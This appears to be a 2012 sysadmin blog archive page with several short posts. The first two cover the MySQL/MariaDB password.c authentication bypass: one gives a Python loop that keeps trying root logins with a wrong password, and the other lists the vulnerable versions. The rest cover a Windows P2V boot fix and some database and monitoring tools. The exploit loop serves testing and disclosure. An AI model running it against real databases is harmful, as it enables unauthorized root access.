Posts

Showing posts from June, 2012

Python Script to Test MySQL password.c hack

vi /root/MySQLByPass.py ========== #!/usr/bin/python import subprocess while 1: subprocess.Popen("mysql -u root mysql --password=xx",shell=True).wait() ========== python /root/MySQLByPass.py

Security vulnerability in MySQL/MariaDB

A vulnerability has been identified in Mysql and MariaDB. Basically under specific conditions it is possible for an attacker to provide any password and it will be accepted. The source file affected is password.c you can find an more detailed explaination and a fix here http://seclists.org/oss-sec/2012/q2/493 All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. If you know a username (root in most cases).  A situation arises where if you connect approx 250 to 300 times, that mysql will allow you connect without any password.

Windows 7 P2V 0xc0000225 and 0x0000007b Error

This was a procedure I found on the web to resolve error 0xc0000225 and 0x0000007b when booting a virtual windows 7 system after performing a p2v Mont the Win7 DVD in VMware Workstation using the removable media options or else change the bios setting in the VM so it will boot from an ISO image. At the first screen (Language Selection), hit Shift-F10 for a command prompt. Run Regedit. Highlight HKEY_LOCAL_MACHINE Load the system hive from the VM's disk, File > Load Hive Select < c: > \Windows\System32\config\system Regedit will ask for a Key name: Name it something like "asdf" Expand HKEY_LOCAL_MACHINE\asdf\ControlSet001\Services\intelide Change the data for value "Start" from "3" to "0". For each service listed below under HKLM/System/CurrentControlSet001/Services/ set the "Start" parameter to the corresponding value from the list below Aliide = 3 Amdide =3 Atapi = 0 Cmdide = 3 iaStorV = 3 intelide = 0

Chive May Replace phpmyadmin

Chive is a Web 2.0 front end for SQL database management. http://www.chive-project.com/

Simple Windows Monitoring with PolyMon

PolyMon is an open source system monitoring solution that can be used to generate email alerts and analyze historical trends of monitor counters and monitor statuses. It is based on the .NET 2.0 framework and SQL Server 2005. The most recent version integrates with Visual Studio 2010 http://polymon.codeplex.com/ I write some software using VB.NET and C# and this is ideal as an add-on, where I can extend it to allow me monitor application specific logs.

Using Unison to Take MySQL Copy

Recently I needed to take a copy of a mysql database dump on a regular basis from a remote CentOS database server hosted in a data centre in the UK, on to a Windows Server based in Ireland also running a similar version of MySQL. We require a copy of the data on an hourly basis So I decided to try out unison to synchronize folders between a remote server and local server Windows Server Firstly download unison from this located at http://www.cis.upenn.edu/~bcpierce/unison/download.html When I downloaded the latest binary option for Windows you get two files, one is the text/command line tool and the other is an application based on gtk. I took a copy of the command line application, created a folder called c:\unison an dropped my file in to that folder. You will also need to grab a copy of an ssh client that will run under windows. you can go with something like cygwin but I wanted something that was quick to install and had a small foot print so I selected OpenSSH for Window